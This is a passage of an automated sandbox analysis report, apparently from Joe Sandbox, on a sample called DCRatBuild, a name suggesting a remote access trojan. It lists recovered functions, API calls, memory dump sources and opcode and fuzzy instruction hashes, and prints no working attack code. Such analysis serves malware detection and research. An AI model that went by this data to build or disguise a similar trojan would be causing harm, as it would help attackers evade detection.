                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F08384
                                        • Part of subcall function 00F01380: __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F01380: new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F019A6: __EH_prolog.LIBCMT ref: 00F019AB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01E05
                                        • Part of subcall function 00F03B3D: __EH_prolog.LIBCMT ref: 00F03B42
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1A7C8
                                        • Part of subcall function 00F01380: __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F01380: new.LIBCMT ref: 00F013FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F05BDC
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00F0968F,?,?,?,?,00F31FA1,000000FF), ref: 00F096EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 94909ec635ce23d74ced6bce8542877bbe9d2dc3acdc3da90358b2759f97ec10
                                      • Instruction ID: b281890a2545948b89c22f5608078e4ffbccb93b67471de796ad558735876175
                                      • Opcode Fuzzy Hash: 94909ec635ce23d74ced6bce8542877bbe9d2dc3acdc3da90358b2759f97ec10
                                      • Instruction Fuzzy Hash: 4BF0897195A7144FDB308A24D55879277E49B12735F044B1ED1FB434E1E7B5644DBF00
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A4F5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 146649ea542fa42ec939d374536060436b61d020b1c6f93053e5e71c9c6c3a49
                                      • Instruction ID: 06aafecae408ff42dc72d33bce14c00988063ef50d3fa40d3489f92778db9995
                                      • Opcode Fuzzy Hash: 146649ea542fa42ec939d374536060436b61d020b1c6f93053e5e71c9c6c3a49
                                      • Instruction Fuzzy Hash: DCF08935409790AACA229B784C047D77B95AF16371F04CA49F1FD121D5C2795495BB23
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00F106B1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: 0d030f002ac01a2c0fbce1f1f60439f514da3cc9ca6b9a64e134177a014d7f98
                                      • Instruction ID: e936b0898db8972ba1a00814deb203b66db52e0a0f265495c4f9588377306159
                                      • Opcode Fuzzy Hash: 0d030f002ac01a2c0fbce1f1f60439f514da3cc9ca6b9a64e134177a014d7f98
                                      • Instruction Fuzzy Hash: 13D0C22460011069D6253324AC057FE3A064FC2730F080031FA0D935CB8E9A08DA72A2
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00F19D81
                                        • Part of subcall function 00F19B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F19B30
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction ID: 8333252a2eff5b209068f6a88884b71c7c420e13347f3be655c2ec65dd342cf2
                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction Fuzzy Hash: 0CD0C731A5C20D7ADF41BB759C32AFA7BA9DB40350F104165BC48C6151EDB2DE90B6E1
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00F09887), ref: 00F09995
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 50abb1b16c75e078e4f8171fc5c6f1ffb207723e3d3bcc62d00078fa3ae473a5
                                      • Instruction ID: 9b36b27ccbf223e5f6b1f243cc45c6903b322d5e35abf16d14a62bb6c24145e6
                                      • Opcode Fuzzy Hash: 50abb1b16c75e078e4f8171fc5c6f1ffb207723e3d3bcc62d00078fa3ae473a5
                                      • Instruction Fuzzy Hash: ADD01271915140A5CF2587384D09099B752DB8337AB38C6A8D025C40E2E773C803F581
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00F1D43F
                                        • Part of subcall function 00F1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                        • Part of subcall function 00F1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                        • Part of subcall function 00F1AC74: IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                        • Part of subcall function 00F1AC74: TranslateMessage.USER32(?), ref: 00F1ACB8
                                        • Part of subcall function 00F1AC74: DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: b6b77a57742b137d2e0c55ae2e4f08f1610b8665a17d3d5adee7777418be91a7
                                      • Instruction ID: f5596d20c5a61fff0c455815558918621ab70dcd45dc23af098c05cff94217d4
                                      • Opcode Fuzzy Hash: b6b77a57742b137d2e0c55ae2e4f08f1610b8665a17d3d5adee7777418be91a7
                                      • Instruction Fuzzy Hash: 7ED09E31144300ABD6116B51CE06F0F7AA6BB99B04F004954B345740F286669D21BB16
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E20B
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7ae4062a08b7041579265b56f23866c5e91b855d3ee12fc9e3ebfa6b975fe484
                                      • Instruction ID: db6dfdf456023961388386aac6d199fd4c64c5cbb9bdf08d8a0471312d7cf8ca
                                      • Opcode Fuzzy Hash: 7ae4062a08b7041579265b56f23866c5e91b855d3ee12fc9e3ebfa6b975fe484
                                      • Instruction Fuzzy Hash: E4B012A366E0027C320C11047D26DB7032CC4C0B60330801AB605D408195428DC67433
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c77e6a5a8f0e8617523b70dd77aaac687bc8418f1be58a779107008e630b074f
                                      • Instruction ID: 8f72fbffee40437a1d773eaaf3c2686b3941338d598207be0059b2e9febb5013
                                      • Opcode Fuzzy Hash: c77e6a5a8f0e8617523b70dd77aaac687bc8418f1be58a779107008e630b074f
                                      • Instruction Fuzzy Hash: 15B0129226C0017C314CB1056D22F7F026CC4C4B20330851BB109D0146D4488C8B7832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0fc0e2bfe241976fccad70c6dd3e292475760e4267c7b714bbe566ec6d09748e
                                      • Instruction ID: a202b0a1102a340a82ae39104549d07532e93454baababaafc1d4b01d1a79049
                                      • Opcode Fuzzy Hash: 0fc0e2bfe241976fccad70c6dd3e292475760e4267c7b714bbe566ec6d09748e
                                      • Instruction Fuzzy Hash: 1AB012A226C001FC314CB1056C22E7B026CC4C0B20330C11BB409C0186D44C8D8A7932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b6c5430769d8d639d62a95941148bef3c0af82e0d9d332cfdb81b965c0333427
                                      • Instruction ID: 981eb06152f64ed59874289ff48f926afc03af4be01223fde25c1bcb9a5a3d5c
                                      • Opcode Fuzzy Hash: b6c5430769d8d639d62a95941148bef3c0af82e0d9d332cfdb81b965c0333427
                                      • Instruction Fuzzy Hash: 8EB0129736C0077C314C920C2D17EB7023CC0C0B20330801AB20AC0041DA448CC67432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6eecc08001e48a378fe32d45de8a1a18205944b55c92f8dbf9529b08a29611fb
                                      • Instruction ID: 93e60b8009a972ba7c526fcc98e009b81cb79cd947a4b5fce1a65c611281016f
                                      • Opcode Fuzzy Hash: 6eecc08001e48a378fe32d45de8a1a18205944b55c92f8dbf9529b08a29611fb
                                      • Instruction Fuzzy Hash: F3B0129736C007BC314C920C2C17EB7023CC0C0B20330811AB50AC1081DA448CC97432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 24ce6ec90a2baac08d2d1121cbfa7658d0c0c64237eb953e6e6065e43defdc71
                                      • Instruction ID: 5f57ba57f14c997a707cfdc064ec0b5d9be3c382bfba6560f32b033a28315513
                                      • Opcode Fuzzy Hash: 24ce6ec90a2baac08d2d1121cbfa7658d0c0c64237eb953e6e6065e43defdc71
                                      • Instruction Fuzzy Hash: 68B0129736C0067C3148921C2C17FB6023CD0C0B20330402AB10BC0042DA408CC97432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
